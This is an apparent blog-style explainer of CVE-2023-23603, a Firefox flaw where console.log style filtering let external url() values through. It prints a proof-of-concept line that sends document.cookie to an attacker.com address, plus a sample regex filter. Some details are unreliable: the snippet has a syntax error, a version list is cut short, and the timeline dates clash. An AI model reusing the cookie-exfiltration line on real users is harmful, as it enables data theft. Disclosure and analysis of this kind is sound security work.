CVE-2023-23603 - How Incomplete Regular Expressions in console.log Style Filtering Led to a Firefox Data Exfiltration Vulnerability

CVE-2023-23603 is a security vulnerability that rocked the Mozilla Firefox and Thunderbird worlds in early 2023. It showed how something as simple as improperly filtered CSS in console.log could open up browsers for data theft—something most people wouldn’t notice during regular debugging or logging. The root cause? Regular expressions (regex) used to block forbidden style properties in console logging weren’t careful enough, letting attackers sneak malicious external URLs into styles sent to the browser console. The result: attackers could potentially leak sensitive data by making a user’s browser log styled messages that secretly “phoned home” to their own servers.

Below, we’ll break down what went wrong—how the flaw worked, some code snippets, and how it was fixed.

Firefox supports styling console.log messages with CSS, like so

console.log('%cI am red!', 'color: red');

To keep users safe, browsers use filters (including regex) to block dangerous styles—properties and values like background-image with url() that could be used for trickery.

However, in versions of Firefox before 109 (and Thunderbird before 102.7, Firefox ESR before 102.7), the regex filters did not fully account for external CSS URLs inside style directives. Particularly, URLs wrapped in url(...) would sometimes slip through.

Why is this dangerous?

If hackers can inject CSS in a console.log call in such a way that the browser downloads content from an external server (using url(http://evil.com/info?cookie=MY_COOKIE)), they can exfiltrate sensitive data right out of the browser if some script or extension logs sensitive info in the first place.

In other words: Something as innocent as reading your own debug logs could become a vector for leaking private data.

Example Exploit

Here is a basic proof-of-concept as described in the Mozilla bug tracker:

// This should NOT be allowed, but older Firefox let it through
console.log('%cSensitive Data', 'background: url(https://attacker.com/log?cookie='; + encodeURIComponent(document.cookie) + '); color: red;');

The browser formats the log message using the attacker-supplied CSS style.

- The style includes a background image pointing to the attacker’s domain, with the document’s cookies embedded.
- The browser initiates a request to https://attacker.com/log?..., leaking the data.

That’s exfiltration via logging—sneaky and subtle.

How Did the Filtering Work Before?

Mozilla used regular expressions to search for forbidden style content in the developer console code. The filters looked for bad properties/names, but didn’t catch external URLs in every context.

Sample (simplified!) code for filtering

// (Hypothetical example for illustration)
const forbiddenPattern = /(?:expression|url\(|behavior)/i;

function sanitizeStyle(style) {
  // Tries to scrub out forbidden patterns
  return forbiddenPattern.test(style) ? '' : style;
}

The real code was more extensive, but the crucial detail is that it didn’t handle fancy uses of url(), lack of quotes, or tricks like whitespace or newline injection. As a result, attackers could slip through by crafting weird, but technically valid, CSS.

Real-World Impact

- Any web page or extension using console.log('%c...') with user-controllable input could be used to exfiltrate data.
- Sensitive information output to the console (for example, data from a password manager, user tokens, or cookies) could be sent right to an attacker's server.
- Developers and IT admins weren’t safe—even opening your developer console could put your data at risk in affected versions.

Firefox ESR (before 102.7)

Other browsers like Chrome or Edge do not appear to have been affected by this specific vulnerability.

How was it fixed?

The fix was to tighten up the regular expressions and improve the sanitization process for styles in console output. Now, modern Firefox checks for any use of url() or similar constructs in style directives, closing the loophole.

Mozilla advisory

> Regular expressions used to filter out forbidden properties and values from style directives in calls to console.log weren't accounting for external URLs. Data could then be potentially exfiltrated from the browser. This vulnerability affects Firefox < 109, Thunderbird < 102.7, and Firefox ESR < 102.7.

What Should You Do?

- Update your browser! If you’re running Firefox 109 or higher, Thunderbird 102.7 or higher, or ESR 102.7 or higher, you’re safe.
- Be cautious with what you log. Even with updates, avoid logging sensitive info to the browser console, especially if untrusted scripts or extensions are in play.
- If you use custom logging in web apps or extensions, sanitize any style input you use with console.log(&#039;%c...&#039;) calls.

References & Links

- Mozilla Security Advisory: MFSA 2023-02 CVE-2023-23603
- Mozilla Bug Tracker: https://bugzilla.mozilla.org/show_bug.cgi?id=1806622
- Release Notes: Firefox 109.

Summary

CVE-2023-23603 is a clear reminder that even developer tools and convenience features like styled logs should be protected with care. Filtering untrusted CSS requires careful, defensive coding, and routine updates are vital for safety!

Timeline

Published on: 06/02/2023 17:15:00 UTC
Last modified on: 06/08/2023 13:40:00 UTC